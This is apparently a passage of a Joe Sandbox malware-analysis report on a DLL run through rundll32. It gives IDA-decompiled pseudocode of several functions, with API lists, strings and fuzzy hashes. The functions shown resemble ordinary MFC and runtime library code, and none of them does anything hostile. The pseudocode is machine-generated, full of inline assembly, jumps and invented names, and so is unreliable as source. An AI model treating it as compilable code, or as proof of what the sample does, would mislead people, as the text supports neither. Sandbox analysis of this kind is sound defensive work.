                                                                        								if(_t42 < 0xff00) {
                                                                        									goto L13;
                                                                        								}
                                                                        								 *(_t45 + 0xa4) = 0xef1f;
                                                                        								goto L17;
                                                                        							} else {
                                                                        								_t42 = (_t42 + 0xffff1000 >> 4) + 0xef00;
                                                                        								L13:
                                                                        								 *(_t45 + 0xa4) = _t42;
                                                                        								L17:
                                                                        								 *(_t38 + 0x38) =  *(_t38 + 0x38) | 0x00000040;
                                                                        								L18:
                                                                        								_t30 =  *(_t45 + 0xa4);
                                                                        								if(_t30 ==  *((intOrPtr*)(_t45 + 0xa8))) {
                                                                        									L21:
                                                                        									return _t30;
                                                                        								}
                                                                        								_t30 = E100220EE(_t46, GetParent( *(_t45 + 0x1c)));
                                                                        								if(_t30 == 0) {
                                                                        									goto L21;
                                                                        								}
                                                                        								return PostMessageA( *(_t45 + 0x1c), 0x36a, 0, 0);
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					 *(_t45 + 0x38) =  *(_t45 + 0x38) & 0xffffffbf;
                                                                        					if( *((intOrPtr*)(_t38 + 0x64)) != 0) {
                                                                        						 *(_t45 + 0xa4) = 0xe002;
                                                                        					} else {
                                                                        						 *(_t45 + 0xa4) = 0xe001;
                                                                        					}
                                                                        					SendMessageA( *(_t45 + 0x1c), 0x362,  *(_t45 + 0xa4), 0);
                                                                        					_t35 =  *((intOrPtr*)( *_t45 + 0x150))();
                                                                        					if(_t35 != 0) {
                                                                        						UpdateWindow( *(_t35 + 0x1c));
                                                                        					}
                                                                        					goto L18;
                                                                        				}
                                                                        				_t30 =  *((intOrPtr*)( *_t40 + 0x7c))(_t42, _a8, _a12);
                                                                        				if(_t30 != 0) {
                                                                        					goto L21;
                                                                        				}
                                                                        				goto L2;
                                                                        			}













                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Message$ParentPostSendUpdateWindow
                                                                        • String ID: @
                                                                        • API String ID: 4141989945-2766056989
                                                                        • Opcode ID: bad5658601269fb567b95f36ded4ee85d4dfb2814405908c13ec14e44f39eb87
                                                                        • Instruction ID: 6191196fd6615e40dc101e77c52f198469b7c7f61996bf1ea28baad2e91494f1
                                                                        • Opcode Fuzzy Hash: bad5658601269fb567b95f36ded4ee85d4dfb2814405908c13ec14e44f39eb87
                                                                        • Instruction Fuzzy Hash: 8D319635601B05EFEB22CF21CD48B5A77E5FF41352F258828E65A9E1A1C7B9A980DB01
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 71%
                                                                        			E10034CE3(void* __ecx, void* __eflags) {
                                                                        				intOrPtr _t18;
                                                                        				intOrPtr* _t20;
                                                                        				intOrPtr _t26;
                                                                        				void* _t33;
                                                                        				void* _t35;
                                                                        
                                                                        				E10011BF0(0x1003a3fc, _t35);
                                                                        				_push(__ecx);
                                                                        				_t33 = __ecx;
                                                                        				 *((intOrPtr*)(_t35 - 0x10)) = 0;
                                                                        				E10034BFF(__ecx, 0x20, _t35 - 0x10);
                                                                        				if( *((intOrPtr*)(_t35 + 8)) != 0 &&  *((intOrPtr*)(_t35 - 0x10)) == 0) {
                                                                        					_t26 = E1001F77E(0x20);
                                                                        					 *((intOrPtr*)(_t35 - 0x10)) = _t26;
                                                                        					_t41 = _t26;
                                                                        					 *(_t35 - 4) = 0;
                                                                        					if(_t26 == 0) {
                                                                        						_t20 = 0;
                                                                        						__eflags = 0;
                                                                        					} else {
                                                                        						_push(0x1e);
                                                                        						_push( *((intOrPtr*)(_t35 + 8)));
                                                                        						_push("File%d");
                                                                        						_push("Recent File List");
                                                                        						_push(0);
                                                                        						_t20 = E10024F0F(_t26, _t41);
                                                                        					}
                                                                        					 *(_t35 - 4) =  *(_t35 - 4) | 0xffffffff;
                                                                        					 *((intOrPtr*)(_t33 + 0x84)) = _t20;
                                                                        					 *((intOrPtr*)( *_t20 + 0x10))();
                                                                        				}
                                                                        				_t18 = E1003599F(_t33, "Settings", "PreviewPages", 0);
                                                                        				 *((intOrPtr*)(_t33 + 0x90)) = _t18;
                                                                        				 *[fs:0x0] =  *((intOrPtr*)(_t35 - 0xc));
                                                                        				return _t18;
                                                                        			}









                                                                        APIs
                                                                        • __EH_prolog.LIBCMT ref: 10034CE8
                                                                          • Part of subcall function 10024F0F: __EH_prolog.LIBCMT ref: 10024F14
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: H_prolog
                                                                        • String ID: File%d$PreviewPages$Recent File List$Settings
                                                                        • API String ID: 3519838083-526586445
                                                                        • Opcode ID: 932e69f2a25fdaf2d1d7247067e9866bd34830d2efb07ad355ada0066ba91e73
                                                                        • Instruction ID: 492fd1891bf7533495f0361d30171d8b100ab146b8dd749383e38376895f11d0
                                                                        • Opcode Fuzzy Hash: 932e69f2a25fdaf2d1d7247067e9866bd34830d2efb07ad355ada0066ba91e73
                                                                        • Instruction Fuzzy Hash: FA01B579A00605AFCB16EF649C05BEEBAB5FB84712F11861FF1569F281DF70A5408750
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 68%
                                                                        			E10028BC6(void* __ecx, intOrPtr _a4) {
                                                                        				struct HINSTANCE__* _t4;
                                                                        				_Unknown_base(*)()* _t5;
                                                                        				void* _t9;
                                                                        				void* _t10;
                                                                        
                                                                        				_t10 = __ecx;
                                                                        				_t4 = GetModuleHandleA("GDI32.DLL");
                                                                        				_t9 = 0;
                                                                        				_t5 = GetProcAddress(_t4, "SetLayout");
                                                                        				if(_t5 == 0) {
                                                                        					if(_a4 != 0) {
                                                                        						_t9 = 0xffffffff;
                                                                        						SetLastError(0x78);
                                                                        					}
                                                                        				} else {
                                                                        					_t9 =  *_t5( *((intOrPtr*)(_t10 + 4)), _a4);
                                                                        				}
                                                                        				return _t9;
                                                                        			}








                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(GDI32.DLL,?,?,10030BC6,00000000), ref: 10028BCF
                                                                        • GetProcAddress.KERNEL32(00000000,SetLayout), ref: 10028BDD
                                                                        • SetLastError.KERNEL32(00000078,?,?,10030BC6,00000000), ref: 10028BFF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: AddressErrorHandleLastModuleProc
                                                                        • String ID: GDI32.DLL$SetLayout
                                                                        • API String ID: 4275029093-2147214759
                                                                        • Opcode ID: f829d107276f7f8dc5ff7ef364a20be20c27fb831297046e44f9a224b6ca2c99
                                                                        • Instruction ID: de10e2654153e74bad07dc63c5cb2a97a5a293e8e121725d640a5f2c86b9b1e6
                                                                        • Opcode Fuzzy Hash: f829d107276f7f8dc5ff7ef364a20be20c27fb831297046e44f9a224b6ca2c99
                                                                        • Instruction Fuzzy Hash: 1AE02077105110BFD253875A9C48C5F7B62D7C4372B11C619F276D5090CB3188018721
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 68%
                                                                        			E10028B90(signed int __ecx) {
                                                                        				_Unknown_base(*)()* _t3;
                                                                        				signed int _t7;
                                                                        				signed int _t8;
                                                                        
                                                                        				_t7 = __ecx;
                                                                        				_t3 = GetProcAddress(GetModuleHandleA("GDI32.DLL"), "GetLayout");
                                                                        				if(_t3 == 0) {
                                                                        					_t8 = _t7 | 0xffffffff;
                                                                        					SetLastError(0x78);
                                                                        				} else {
                                                                        					_t8 =  *_t3( *((intOrPtr*)(_t7 + 4)));
                                                                        				}
                                                                        				return _t8;
                                                                        			}







                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(GDI32.DLL,?,10030BB9), ref: 10028B98
                                                                        • GetProcAddress.KERNEL32(00000000,GetLayout), ref: 10028BA4
                                                                        • SetLastError.KERNEL32(00000078), ref: 10028BBC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: AddressErrorHandleLastModuleProc
                                                                        • String ID: GDI32.DLL$GetLayout
                                                                        • API String ID: 4275029093-2396518106
                                                                        • Opcode ID: 8afe1690608ce82dbca3926b0a057167ce80ddde095d094937dead2d2ff1ddbb
                                                                        • Instruction ID: 54bc3d33d325d2134ddbcfb4761d493361e18e0aa1f1c781400aef32ec3f8dd9
                                                                        • Opcode Fuzzy Hash: 8afe1690608ce82dbca3926b0a057167ce80ddde095d094937dead2d2ff1ddbb
                                                                        • Instruction Fuzzy Hash: BBD05EB6A052346FDAA35BF5AC4CE5A7A54DB047B2B418669FD65EA1E0CB24CC008790
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 68%
                                                                        			E10011DCF(int _a4) {
                                                                        				struct HINSTANCE__* _t3;
                                                                        				_Unknown_base(*)()* _t4;
                                                                        
                                                                        				_t3 = GetModuleHandleA("mscoree.dll");
                                                                        				if(_t3 != 0) {
                                                                        					_t4 = GetProcAddress(_t3, "CorExitProcess");
                                                                        					if(_t4 != 0) {
                                                                        						 *_t4(_a4);
                                                                        					}
                                                                        				}
                                                                        				ExitProcess(_a4);
                                                                        			}






                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(mscoree.dll,10011F3D,?,10041DB0,00000008,10011F63,?,00000001,00000000,10016CF1,00000003), ref: 10011DD4
                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10011DE4
                                                                        • ExitProcess.KERNEL32 ref: 10011DF8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: AddressExitHandleModuleProcProcess
                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                        • API String ID: 75539706-1276376045
                                                                        • Opcode ID: 3fc20c7666ee96b06c5226d441d543eb9b5fbec8a0200ca7e01eb325b998744c
                                                                        • Instruction ID: 44dc424d0b29a2a163b933457fd361873f6b0f507bf76f9d722852a62850aa7a
                                                                        • Opcode Fuzzy Hash: 3fc20c7666ee96b06c5226d441d543eb9b5fbec8a0200ca7e01eb325b998744c
                                                                        • Instruction Fuzzy Hash: F2D0C9B0604217AFEA429BB2CD48DEB3AA8EF406857108428F416D8021CF31CD019B11
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 53%
                                                                        			E100394B0(intOrPtr __ecx, intOrPtr __edx) {
                                                                        				CHAR* _t94;
                                                                        				void* _t100;
                                                                        				intOrPtr _t101;
                                                                        				void* _t108;
                                                                        				intOrPtr _t114;
                                                                        				void* _t116;
                                                                        				void* _t117;
                                                                        				void* _t120;
                                                                        				signed short _t123;
                                                                        				signed int _t125;
                                                                        				signed int _t128;
                                                                        				void* _t134;
                                                                        				char _t140;
                                                                        				CHAR* _t144;
                                                                        				intOrPtr* _t147;
                                                                        				void* _t149;
                                                                        				void* _t151;
                                                                        				intOrPtr _t153;
                                                                        				signed short* _t156;
                                                                        				void* _t157;
                                                                        				CHAR* _t159;
                                                                        				int _t161;
                                                                        				char* _t166;
                                                                        				void* _t167;
                                                                        				void* _t168;
                                                                        				void* _t170;
                                                                        				CHAR* _t171;
                                                                        				char* _t174;
                                                                        				CHAR* _t182;
                                                                        
                                                                        				_t153 = __edx;
                                                                        				_t148 = __ecx;
                                                                        				E10011BF0(0x1003b2f6, _t168);
                                                                        				_t171 = _t170 - 0x2c;
                                                                        				_t144 =  *(_t168 + 8);
                                                                        				_t94 = _t144[8];
                                                                        				 *(_t168 - 0x10) = _t171;
                                                                        				 *((intOrPtr*)(_t168 - 0x20)) = __ecx;
                                                                        				 *(_t168 - 0x11) = 0;
                                                                        				 *(_t168 + 8) = _t94;
                                                                        				if(_t94 == 0) {
                                                                        					 *(_t168 + 8) = _t168 - 0x11;
                                                                        				}
                                                                        				_t161 = lstrlenA( *(_t168 + 8));
                                                                        				 *(_t168 - 0x18) = _t144[0x10];
                                                                        				 *(_t168 - 0x1c) = _t144[0xc];
                                                                        				if(( *(_t168 + 0xc) & 0x0000000c) == 0) {
                                                                        					L7:
                                                                        					_t145 =  *(_t168 + 0x14);
                                                                        					_t100 = E10001000(_t148, ( *(_t168 + 0x14))[8] << 4);
                                                                        					_pop(_t149);
                                                                        					if(_t100 == 0) {
                                                                        						L9:
                                                                        						_t101 = 0x8007000e;
                                                                        						L47:
                                                                        						 *[fs:0x0] =  *((intOrPtr*)(_t168 - 0xc));
                                                                        						return _t101;
                                                                        					}
                                                                        					E10010B20((_t145[8] << 0x00000004) + 0x00000003 & 0xfffffffc, _t149);
                                                                        					 *(_t168 - 0x10) = _t171;
                                                                        					 *(_t168 + 0xc) = _t171;
                                                                        					E10011C50( *(_t168 + 0xc), 0, _t145[8] << 4);
                                                                        					_t174 =  &(_t171[0xc]);
                                                                        					_t156 = E10039215( *(_t168 + 8),  *(_t168 - 0x1c));
                                                                        					_t38 =  &(_t156[8]); // 0x10
                                                                        					_t165 = _t38;
                                                                        					_t108 = E10001000(_t149, _t38);
                                                                        					_pop(_t151);
                                                                        					if(_t108 != 0) {
                                                                        						E10010B20( &(_t165[1]) & 0xfffffffc, _t151);
                                                                        						 *(_t168 - 0x10) = _t174;
                                                                        						_t166 = _t174;
                                                                        						_t114 = E10039257( *((intOrPtr*)(_t168 - 0x20)), _t166,  *(_t168 + 8), _t168 - 0x34,  *(_t168 - 0x1c), _t145,  *((intOrPtr*)(_t168 + 0x18)),  *(_t168 + 0xc));
                                                                        						_t147 = 0;
                                                                        						 *((intOrPtr*)(_t168 + 0x18)) = _t114;
                                                                        						if(_t114 != 0) {
                                                                        							L17:
                                                                        							_t166 =  *(_t168 + 0x14);
                                                                        							 *(_t168 - 4) =  *(_t168 - 4) | 0xffffffff;
                                                                        							_t157 = 0;
                                                                        							if(_t166[8] <= 0) {
                                                                        								L20:
                                                                        								_t101 =  *((intOrPtr*)(_t168 + 0x18));
                                                                        								if(_t101 != 0) {
                                                                        									goto L47;
                                                                        								}
                                                                        								_t156 =  *(_t168 + 0x10);
                                                                        								if(_t156 == 0) {
                                                                        									_t116 = ( *(_t168 - 0x1c) & 0x0000ffff) - 8;
                                                                        									if(_t116 == 0) {
                                                                        										if(_t147 != 0) {
                                                                        											__imp__#6(_t147);
                                                                        										}
                                                                        										L46:
                                                                        										_t101 = 0;
                                                                        										goto L47;
                                                                        									}
                                                                        									_t117 = _t116 - 1;
                                                                        									if(_t117 == 0) {
                                                                        										L41:
                                                                        										if(_t147 != 0) {
                                                                        											 *((intOrPtr*)( *_t147 + 8))(_t147);
                                                                        										}
                                                                        										goto L46;
                                                                        									}
                                                                        									_t120 = _t117 - 3;
                                                                        									if(_t120 == 0) {
                                                                        										__imp__#9(_t168 - 0x34);
                                                                        										goto L46;
                                                                        									}
                                                                        									if(_t120 != 1) {
                                                                        										goto L46;
                                                                        									}
                                                                        									goto L41;
                                                                        								}
                                                                        								_t123 =  *(_t168 - 0x1c);
                                                                        								 *_t156 = _t123;
                                                                        								_t125 = (_t123 & 0x0000ffff) + 0xfffffffe;
                                                                        								if(_t125 > 0x13) {
                                                                        									goto L46;
                                                                        								}
                                                                        								switch( *((intOrPtr*)(_t125 * 4 +  &M10039776))) {
                                                                        									case 0:
                                                                        										L35:
                                                                        										 *(__edi + 8) = __bx;
                                                                        										goto L46;
                                                                        									case 1:
                                                                        										 *(__edi + 8) = __ebx;
                                                                        										goto L46;
                                                                        									case 2:
                                                                        										__eax =  *(__ebp - 0x34);
                                                                        										 *(__edi + 8) =  *(__ebp - 0x34);
                                                                        										goto L46;
                                                                        									case 3:
                                                                        										 *(__edi + 8) =  *(__ebp - 0x34);
                                                                        										goto L46;
                                                                        									case 4:
                                                                        										__eax =  *(__ebp - 0x34);
                                                                        										 *(__edi + 8) =  *(__ebp - 0x34);
                                                                        										__eax =  *(__ebp - 0x30);
                                                                        										 *(__edi + 0xc) =  *(__ebp - 0x30);
                                                                        										goto L46;
                                                                        									case 5:
                                                                        										__ebx =  ~__ebx;
                                                                        										asm("sbb ebx, ebx");
                                                                        										goto L35;
                                                                        									case 6:
                                                                        										asm("movsd");
                                                                        										asm("movsd");
                                                                        										asm("movsd");
                                                                        										asm("movsd");
                                                                        										goto L46;
                                                                        									case 7:
                                                                        										goto L46;
                                                                        									case 8:
                                                                        										 *(__edi + 8) = __bl;
                                                                        										goto L46;
                                                                        								}
                                                                        							}
                                                                        							do {
                                                                        								__imp__#9( *(_t168 + 0xc));
                                                                        								 *(_t168 + 0xc) =  &(( *(_t168 + 0xc))[0x10]);
                                                                        								_t157 = _t157 + 1;
                                                                        							} while (_t157 < _t166[8]);
                                                                        							goto L20;
                                                                        						}
                                                                        						_t128 =  *(_t168 - 0x1c) & 0x0000ffff;
                                                                        						 *(_t168 - 4) = 0;
                                                                        						if(_t128 == 4) {
                                                                        							_push(_t156);
                                                                        							_push(_t166);
                                                                        							_push( *(_t168 - 0x18));
                                                                        							E1003A087();
                                                                        							 *(_t168 + 8) = _t182;
                                                                        							 *(_t168 - 0x34) =  *(_t168 + 8);
                                                                        							goto L17;
                                                                        						}
                                                                        						if(_t128 == 5) {
                                                                        							_push(_t156);
                                                                        							_push(_t166);
                                                                        							_push( *(_t168 - 0x18));
                                                                        							E1003A087();
                                                                        							asm("fst qword [ebp-0x24]");
                                                                        							L27:
                                                                        							 *(_t168 - 0x34) = _t182;
                                                                        							goto L17;
                                                                        						}
                                                                        						if(_t128 == 7) {
                                                                        							_push(_t156);
                                                                        							_push(_t166);
                                                                        							_push( *(_t168 - 0x18));
                                                                        							E1003A087();
                                                                        							asm("fst qword [ebp-0x24]");
                                                                        							goto L27;
                                                                        						}
                                                                        						if(_t128 <= 0x13 || _t128 > 0x15) {
                                                                        							_push(_t156);
                                                                        							_push(_t166);
                                                                        							_push( *(_t168 - 0x18));
                                                                        							_t147 = E1003A087();
                                                                        						} else {
                                                                        							_push(_t156);
                                                                        							_push(_t166);
                                                                        							_push( *(_t168 - 0x18));
                                                                        							 *(_t168 - 0x34) = E1003A087();
                                                                        							 *((intOrPtr*)(_t168 - 0x30)) = _t153;
                                                                        						}
                                                                        						goto L17;
                                                                        					}
                                                                        					goto L9;
                                                                        				}
                                                                        				_t17 = _t161 + 3; // 0x3
                                                                        				_t158 = _t17;
                                                                        				_t134 = E10001000(_t148, _t17);
                                                                        				_pop(_t148);
                                                                        				if(_t134 == 0) {
                                                                        					goto L9;
                                                                        				}
                                                                        				E10010B20(_t158 + 0x00000003 & 0xfffffffc, _t148);
                                                                        				 *(_t168 - 0x10) = _t171;
                                                                        				_t159 = _t171;
                                                                        				E10011440(_t159,  *(_t168 + 8), _t161);
                                                                        				_t140 = _t144[0xc];
                                                                        				_t171 =  &(_t171[0xc]);
                                                                        				 *(_t168 + 8) = _t159;
                                                                        				if(_t140 == 8) {
                                                                        					_t140 = 0xe;
                                                                        				}
                                                                        				_t159[_t161] = 0xff;
                                                                        				_t167 = _t161 + 1;
                                                                        				 *(_t168 - 0x1c) =  *(_t168 - 0x1c) & 0x00000000;
                                                                        				_t159[_t167] = _t140;
                                                                        				_t159[_t167 + 1] = 0;
                                                                        				 *(_t168 - 0x18) = _t144[0x14];
                                                                        				goto L7;
                                                                        			}

































                                                                        APIs
                                                                        • __EH_prolog.LIBCMT ref: 100394B5
                                                                        • lstrlenA.KERNEL32(?,?,00000000), ref: 100394E0
                                                                        • VariantClear.OLEAUT32(0000000C), ref: 1003963C
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: ClearH_prologVariantlstrlen
                                                                        • String ID:
                                                                        • API String ID: 2416264355-0
                                                                        • Opcode ID: 01d55cbef57070eba50bc1bacdd47ccffadd2fabc5e95ff73a26932456179a65
                                                                        • Instruction ID: 794d22016aebeea8945113baaba77667614d3c7e1eb394332e3a898872445e5b
                                                                        • Opcode Fuzzy Hash: 01d55cbef57070eba50bc1bacdd47ccffadd2fabc5e95ff73a26932456179a65
                                                                        • Instruction Fuzzy Hash: 8381B13590465AEFCF12CFA9C881A9EBBB5FF05391F208115F854AF291D735EA90CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 78%
                                                                        			E10018BEF(intOrPtr* _a4) {
                                                                        				signed int _v8;
                                                                        				signed int _v12;
                                                                        				signed int _v16;
                                                                        				intOrPtr _v20;
                                                                        				intOrPtr _v24;
                                                                        				void* __edi;
                                                                        				void* __ebp;
                                                                        				intOrPtr* _t89;
                                                                        				void* _t90;
                                                                        				void* _t101;
                                                                        				intOrPtr _t112;
                                                                        				void* _t115;
                                                                        				signed int _t120;
                                                                        				signed int _t125;
                                                                        				intOrPtr _t132;
                                                                        				intOrPtr _t133;
                                                                        				void* _t138;
                                                                        				intOrPtr _t140;
                                                                        				signed int _t142;
                                                                        				signed int _t143;
                                                                        				signed int _t146;
                                                                        				signed int _t147;
                                                                        				signed int _t148;
                                                                        				signed int _t149;
                                                                        				signed int _t150;
                                                                        				signed int _t152;
                                                                        				void* _t159;
                                                                        				intOrPtr _t162;
                                                                        				signed int _t164;
                                                                        				signed int _t165;
                                                                        				void* _t168;
                                                                        				void* _t169;
                                                                        				void* _t170;
                                                                        				void* _t172;
                                                                        				intOrPtr* _t173;
                                                                        				intOrPtr _t174;
                                                                        				void* _t176;
                                                                        				intOrPtr _t180;
                                                                        
                                                                        				_t89 = _a4;
                                                                        				_v12 = _v12 & 0x00000000;
                                                                        				_t133 =  *((intOrPtr*)(_t89 + 4));
                                                                        				_t162 =  *_t89;
                                                                        				_v24 = _t162;
                                                                        				_v20 = _t133;
                                                                        				_t90 = E1001519D(_t162);
                                                                        				_t174 = _t133;
                                                                        				_t172 = _t90;
                                                                        				if(_t174 < 0 || _t174 <= 0 && _t162 < 0) {
                                                                        					L28:
                                                                        					return 0;
                                                                        				} else {
                                                                        					_t176 = _t133 - 0x1000;
                                                                        					if(_t176 > 0 || _t176 >= 0 && _t162 > 0) {
                                                                        						goto L28;
                                                                        					} else {
                                                                        						if( *((intOrPtr*)(_t172 + 0x44)) != 0) {
                                                                        							L9:
                                                                        							_t173 =  *((intOrPtr*)(_t172 + 0x44));
                                                                        							L10:
                                                                        							_t142 = E10013780(_t162, _t133, 0x1e13380, 0) + 0x46;
                                                                        							_t10 = _t142 + 0x12b; // 0xe5
                                                                        							asm("cdq");
                                                                        							_t15 = _t142 - 1; // -71
                                                                        							_v16 = _t15;
                                                                        							_v8 = _t142;
                                                                        							asm("cdq");
                                                                        							_t164 = 0x64;
                                                                        							_t165 = 4;
                                                                        							asm("cdq");
                                                                        							_t28 = _v16 / _t165 - 0x11; // 0xd4
                                                                        							asm("cdq");
                                                                        							_t29 = _t142 - 0x46; // -140
                                                                        							asm("cdq");
                                                                        							_t101 = E100122A0(_t29, _v16 % _t165, 0xfffffe93, 0xffffffff);
                                                                        							asm("sbb edx, ebx");
                                                                        							_t138 = 0x15180;
                                                                        							_t168 = _v24 + E100122A0(_t101 - _t10 / 0x190 - _t15 / _t164 + _t28, _v16 % _t165, 0x15180, 0);
                                                                        							asm("adc [ebp-0x10], edx");
                                                                        							_t180 = _v20;
                                                                        							if(_t180 > 0 || _t180 >= 0 && _t168 >= 0) {
                                                                        								asm("cdq");
                                                                        								_t143 = 4;
                                                                        								if(_v8 % _t143 != 0) {
                                                                        									L19:
                                                                        									asm("cdq");
                                                                        									_t158 = (_v8 + 0x76c) % 0x190;
                                                                        									if((_v8 + 0x76c) % 0x190 != 0) {
                                                                        										goto L21;
                                                                        									}
                                                                        									goto L20;
                                                                        								}
                                                                        								asm("cdq");
                                                                        								_t149 = 0x64;
                                                                        								_t158 = _v8 % _t149;
                                                                        								if(_v8 % _t149 != 0) {
                                                                        									goto L20;
                                                                        								}
                                                                        								goto L19;
                                                                        							} else {
                                                                        								_t125 = _v16;
                                                                        								_v8 = _t125;
                                                                        								_t168 = _t168 + 0x1e13380;
                                                                        								asm("adc dword [ebp-0x10], 0x0");
                                                                        								asm("cdq");
                                                                        								_t150 = 4;
                                                                        								if(_t125 % _t150 != 0) {
                                                                        									L15:
                                                                        									asm("cdq");
                                                                        									_t158 = (_v8 + 0x76c) % 0x190;
                                                                        									if((_v8 + 0x76c) % 0x190 != 0) {
                                                                        										L21:
                                                                        										 *((intOrPtr*)(_t173 + 0x14)) = _v8;
                                                                        										 *((intOrPtr*)(_t173 + 0x1c)) = E10013780(_t168, _v20, _t138, 0);
                                                                        										asm("cdq");
                                                                        										_t169 = _t168 + E100122A0(_t110, _t158, 0xfffeae80, 0xffffffff);
                                                                        										asm("adc [ebp-0x10], edx");
                                                                        										_t159 = 0x1004ce98;
                                                                        										if(_v12 == 0) {
                                                                        											_t159 = 0x1004cecc;
                                                                        										}
                                                                        										_t112 =  *((intOrPtr*)(_t173 + 0x1c));
                                                                        										_t146 = 1;
                                                                        										if( *((intOrPtr*)(_t159 + 4)) >= _t112) {
                                                                        											L27:
                                                                        											_t147 = _t146 - 1;
                                                                        											 *(_t173 + 0x10) = _t147;
                                                                        											 *((intOrPtr*)(_t173 + 0xc)) = _t112 -  *((intOrPtr*)(_t159 + _t147 * 4));
                                                                        											_t115 = E10013780( *_a4,  *((intOrPtr*)(_a4 + 4)), _t138, 0);
                                                                        											_t148 = 7;
                                                                        											asm("cdq");
                                                                        											 *(_t173 + 0x18) = (_t115 + 4) % _t148;
                                                                        											 *((intOrPtr*)(_t173 + 8)) = E10013780(_t169, _v20, 0xe10, 0);
